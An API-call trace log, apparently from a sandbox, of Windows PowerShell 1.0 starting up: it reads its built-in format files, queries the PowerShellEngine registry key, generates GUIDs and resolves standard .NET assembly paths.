	[0315.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.468] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x308) returned 0x0
	[0315.468] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0315.468] CoTaskMemAlloc (cb=0x5a) returned 0x149fc0
	[0315.468] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x149fc0, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0315.468] CoTaskMemFree (pv=0x149fc0) 
	[0315.468] RegCloseKey (hKey=0x308) returned 0x0
	[0315.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.475] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x17ff0cb6, Data2=0x2f37, Data3=0x495c, Data4=([0]=0xa1, [1]=0x14, [2]=0x15, [3]=0x5c, [4]=0xa, [5]=0x63, [6]=0xf9, [7]=0xe1))) returned 0x0
	[0315.488] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xf242958f, Data2=0x6733, Data3=0x4a38, Data4=([0]=0x85, [1]=0xf9, [2]=0x47, [3]=0x72, [4]=0x30, [5]=0x93, [6]=0xd2, [7]=0x7a))) returned 0x0
	[0315.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.491] SetErrorMode (uMode=0x1) returned 0x1
	[0315.491] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0315.491] GetFileType (hFile=0x308) returned 0x1
	[0315.491] SetErrorMode (uMode=0x1) returned 0x1
	[0315.491] GetFileType (hFile=0x308) returned 0x1
	[0315.491] ReadFile (in: hFile=0x308, lpBuffer=0x3230a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230a78*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.492] ReadFile (in: hFile=0x308, lpBuffer=0x3230a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230a78*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.492] ReadFile (in: hFile=0x308, lpBuffer=0x3230a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230a78*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.493] ReadFile (in: hFile=0x308, lpBuffer=0x3230a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230a78*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.493] ReadFile (in: hFile=0x308, lpBuffer=0x3230a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230a78*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.494] ReadFile (in: hFile=0x308, lpBuffer=0x3230a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230a78*, lpNumberOfBytesRead=0x28ceb8*=0xfb2, lpOverlapped=0x0) returned 1
	[0315.494] ReadFile (in: hFile=0x308, lpBuffer=0x3230192, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230192*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.494] ReadFile (in: hFile=0x308, lpBuffer=0x3230a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3230a78*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.494] CloseHandle (hObject=0x308) returned 1
	[0315.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.494] SetErrorMode (uMode=0x1) returned 0x1
	[0315.494] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0315.494] SetErrorMode (uMode=0x1) returned 0x1
	[0315.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.495] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x308) returned 0x0
	[0315.495] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0315.495] CoTaskMemAlloc (cb=0x5a) returned 0x149770
	[0315.495] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x149770, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0315.495] CoTaskMemFree (pv=0x149770) 
	[0315.495] RegCloseKey (hKey=0x308) returned 0x0
	[0315.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0315.497] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x94668596, Data2=0x981, Data3=0x4948, Data4=([0]=0xbb, [1]=0xd0, [2]=0xf3, [3]=0xf1, [4]=0x55, [5]=0x4d, [6]=0xd7, [7]=0x3c))) returned 0x0
	[0315.920] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe49d898c, Data2=0x6325, Data3=0x44fa, Data4=([0]=0xb9, [1]=0x5c, [2]=0xee, [3]=0xbc, [4]=0x25, [5]=0x57, [6]=0x9a, [7]=0x69))) returned 0x0
	[0315.921] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x6ac966a0, Data2=0x499b, Data3=0x4f89, Data4=([0]=0xb4, [1]=0x6f, [2]=0x39, [3]=0x30, [4]=0x77, [5]=0xa7, [6]=0xbd, [7]=0x11))) returned 0x0
	[0315.921] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xe64c90be, Data2=0x81e, Data3=0x495c, Data4=([0]=0xb4, [1]=0x8b, [2]=0x9b, [3]=0x33, [4]=0x8c, [5]=0xeb, [6]=0xa1, [7]=0x94))) returned 0x0
	[0315.922] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xae7a448c, Data2=0x30be, Data3=0x4225, Data4=([0]=0x9a, [1]=0x3, [2]=0x6a, [3]=0xa6, [4]=0x7b, [5]=0x3f, [6]=0x59, [7]=0x4f))) returned 0x0
	[0315.922] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xa6adfa01, Data2=0xb851, Data3=0x4ab2, Data4=([0]=0xa7, [1]=0x2e, [2]=0x5f, [3]=0x97, [4]=0xe4, [5]=0x9e, [6]=0x6f, [7]=0xd4))) returned 0x0
	[0315.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.922] SetErrorMode (uMode=0x1) returned 0x1
	[0315.922] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0315.923] GetFileType (hFile=0x308) returned 0x1
	[0315.923] SetErrorMode (uMode=0x1) returned 0x1
	[0315.923] GetFileType (hFile=0x308) returned 0x1
	[0315.923] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.923] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.924] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.924] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.925] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.925] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0315.925] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0xaca, lpOverlapped=0x0) returned 1
	[0315.925] ReadFile (in: hFile=0x308, lpBuffer=0x327be0a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327be0a*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.925] ReadFile (in: hFile=0x308, lpBuffer=0x327c7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x327c7d8*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0315.925] CloseHandle (hObject=0x308) returned 1
	[0315.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.926] SetErrorMode (uMode=0x1) returned 0x1
	[0315.926] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0315.926] SetErrorMode (uMode=0x1) returned 0x1
	[0315.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.926] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x308) returned 0x0
	[0315.926] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0315.926] CoTaskMemAlloc (cb=0x5a) returned 0x149770
	[0315.926] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x149770, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0315.926] CoTaskMemFree (pv=0x149770) 
	[0315.926] RegCloseKey (hKey=0x308) returned 0x0
	[0315.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0315.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0315.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0315.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0315.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0315.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0315.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0315.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0315.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0315.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0315.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0315.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0315.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0315.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0315.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0315.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0316.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0316.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0316.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0316.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.737] VirtualQuery (in: lpAddress=0x28b9e0, lpBuffer=0x28c8a0, dwLength=0x30 | out: lpBuffer=0x28c8a0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.738] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x9011c177, Data2=0x862d, Data3=0x43d6, Data4=([0]=0x94, [1]=0x8f, [2]=0xf4, [3]=0x9, [4]=0x1d, [5]=0x88, [6]=0x81, [7]=0x70))) returned 0x0
	[0316.739] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x2ff34d9, Data2=0x2009, Data3=0x46b8, Data4=([0]=0xa5, [1]=0x27, [2]=0x4f, [3]=0xe9, [4]=0x46, [5]=0xd0, [6]=0x83, [7]=0xd0))) returned 0x0
